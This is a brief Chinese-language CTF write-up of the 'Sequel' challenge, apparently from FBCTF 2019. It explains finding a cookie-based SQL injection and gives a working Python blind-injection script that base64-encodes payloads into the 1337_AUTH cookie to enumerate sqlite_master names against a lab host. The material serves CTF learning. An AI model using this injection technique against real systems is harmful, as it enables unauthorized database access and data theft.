Sequel

爆破账号密码guest/guest

发现有三个都是no node for guest，感觉需要提权。

于是检查Cookie，找到了一串奇怪的Cookie：

最后发现是Cookie注入，利用盲注Cookie爆破密码。

脚本自己没有写出来（参考链接）。

import requests
import base64
import string
import sys

out = ""
while True:
    for letter in string.printable:
        tmp = out + letter
        payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\" limit 1) OR \"","password":"guest"}}'.format(
            tmp + '%')
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        r = requests.get('http://9c61f34f-32c8-4eae-a49a-b9fa29a54546.node3.buuoj.cn/sequels',
                         cookies={"1337_AUTH": payload})
        if "Movie" in r.text:
            out = tmp
            sys.stdout.write(letter)
            sys.stdout.flush()
            break

PreviousKookie Next2019 FBCTF

Last updated 1 year ago